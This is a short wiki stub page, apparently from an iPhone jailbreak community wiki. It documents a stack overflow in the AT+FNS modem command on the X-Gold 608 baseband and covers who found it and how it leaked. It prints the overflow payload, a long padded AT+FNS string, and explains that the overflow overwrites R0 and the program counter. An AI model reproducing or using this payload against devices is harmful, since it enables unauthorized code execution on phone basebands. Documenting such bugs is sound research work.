AT+FNS

From The iPhone Wiki
Revision as of 16:22, 19 February 2011 by 5urd (talk | contribs)
Jump to: navigation, search

Credit

Oranav

Exploit

There is a stack overflow in the AT+FNS=0,"..." command, which allows unsigned code execution on the X-Gold 608

AT+FNS="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000001111112222333344445555666677"

The exploit overwrites R0 and R2 on the stack, and R2 is copied to PC on exit from the routine. Therefore it can be used to overwrite R0 and PC.

Description

Yet another buffer overflow in AT commands, like AT+XLOG and AT+stkprof. Leaked by NitroKey who somehow intercepted the information and pastied it with hashes shortly after Oranav had disclosed it to the iPhone Dev Team.

Hacking.png This hacking article is a "stub", an incomplete page. Please add more content to this article and remove this tag.